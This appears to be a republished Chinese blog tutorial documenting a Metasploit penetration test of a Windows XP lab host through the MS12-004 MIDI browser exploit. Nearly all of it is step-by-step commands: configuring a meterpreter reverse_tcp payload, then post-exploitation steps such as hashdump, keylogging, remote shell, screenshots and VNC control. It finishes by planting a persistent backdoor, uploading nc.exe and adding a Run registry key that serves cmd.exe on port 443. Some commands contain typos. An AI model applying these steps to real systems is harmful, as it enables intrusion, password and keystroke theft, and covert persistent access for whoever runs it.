Metasploit渗透测试【进阶】

xiaoxiao2021-02-28  27

Metasploit渗透测试【进阶】

摘要

记录一次完整的Metasploit测试!利用漏洞MS12-004


工具 :

Metasploit FeamworkNetcat

Let’s Go!【漏洞查证】!

1:控制台执行 msfconsole 启动Metasploit :>>>

msfconsole

2:输入命令 search ms12_004,我们来找找ms12-004漏洞的利用模块>>>

search ms12_004

3:找到之后,接下来使用该模块,输入命令:>>>

Use exploits/windows/browser/ms12_004_midi

4:显示该漏洞的基本信息,以及要设置的参数输入命令:>>>

show options

5:设置参数,输入命令 :>>>

set SRVHOST 192.168.42.139 Set PAYLOAD windows/meterpreter/reverse_tcp Set LHOST 192.168.42.130 Set URIOATH

最后 再输入show options ,查看是否设置好

漏洞利用

1:开始渗透,执行命令 :>>>

Exploit

可以看到服务已经启动了,链接地址http://192.168.42.130:8080/

在用Xp打开恶意链接地址 http://192.168.42.130:8080/

BackTrack 开始渗透,这边BT5已经有反应了 ,渗透成功

输入命令:>>>

Sessions

我们看到有一个会话,会话的 ID 是1 ,开打开这个会话,输入命令:>>>

Sessions -i 1

这时,我们已经进入了Meterpreter Meterpreter 是一个很强大的 payload , 具体说明输入 help 可以看到,

Meterpreter > hashdump // 可以看到远程主机帐号和加密后的密码

这里再说几个常用的Meterpreter 命令

Meterpreter > keyscan_start //开启键盘记录 Meterpreter > heyscan_dump // 查看键盘记录的内容 Meterpreter > keyscan_stop // 关闭键盘记录 Meterpreter > shell //看下图大家都懂的

Meterpreter > ps // 获取远程主机进程列表,比windows自带的任务管理器清晰多了

Meterpreter > screenshot // 截取远程桌面屏幕

Meterpreter > run vnc // 开启远程主机vnc 服务

过一会,可以看到桌面,并且可以控制鼠标和键盘

后门程序植入

1:先上传 nc.exe(netcant)到windows的systen32文件夹下 Meterpreter > Upload /pentest/windows-binaries/tools/nc.exe c:\windows\system32 2:将nc.exe加到注册表,让他开机自启动(1)先查看注册表 Reg enumkey -k HKLM\SOFTWARE\Miorosoft\Windows\CurrentVersion\Run (2)看到注册表键值、加入注册表 Reg setval -k HKLM\SOFTWARE\Miorosoft\Windows\CurrentVersion\Run -v backdoor -d c:\windows\system32\nc.exe”-L -d -p 443 cmd.exe” (3)提示成功,查看下XP的注册表

3:我们重启远程主机试下,输命令:>>>

reboot

4:

Telnet 192.168.42.139 443

本文整理自:【http://blog.0x7c00.cn/?p=165】

转载请注明原文地址: https://www.6miu.com/read-1036945.html

最新回复(0)